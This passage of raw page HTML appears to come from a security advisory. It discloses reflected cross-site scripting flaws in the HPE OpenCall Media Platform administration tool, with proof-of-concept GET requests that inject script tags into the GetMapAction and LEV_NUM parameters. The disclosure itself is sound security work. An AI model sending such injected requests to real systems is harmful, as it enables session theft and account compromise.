18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N30c4b8&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;c10b2&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83665404695707-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83665404695707-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83665404695707-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83665404695707-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83665404695707-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83665404695707-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83665404695707-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83665404695707-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83665404695707-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83665404695707-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83665404695707-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">N30c4b8<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">c10b2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83665404695707-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83665404695707-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83665404695707-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83665404695707-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83665404695707-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83665404695707-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83665404695707-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83665404695707-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83665404695707-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>GetMapAction<\/em> function<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize <em>GetMapAction<\/em> function input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?<strong>GetMapAction<\/strong>=HTMLaec5a&#8221;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;70733&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8366b127094428\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a&#8221;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;70733&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8366b127094428-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8366b127094428-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8366b127094428-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8366b127094428-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8366b127094428-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8366b127094428-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8366b127094428-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8366b127094428-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8366b127094428-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8366b127094428-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8366b127094428-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">HTMLaec5a<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">70733<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8366b127094428-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8366b127094428-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8366b127094428-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8366b127094428-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8366b127094428-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8366b127094428-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8366b127094428-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8366b127094428-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8366b127094428-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0028 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/XSS_GetMapAction.png\" data-slb-active=\"1\" data-slb-asset=\"1819691015\" data-slb-internal=\"0\" data-slb-group=\"3087\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3093\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/XSS_GetMapAction-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/XSS_GetMapAction-300x169.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/XSS_GetMapAction-768x432.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/XSS_GetMapAction-1024x576.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_NUM<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NUM input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL:<br \/> <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;<strong>LEV_NUM<\/strong>=00b96d&#8221;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;58400&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83670502195025\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div 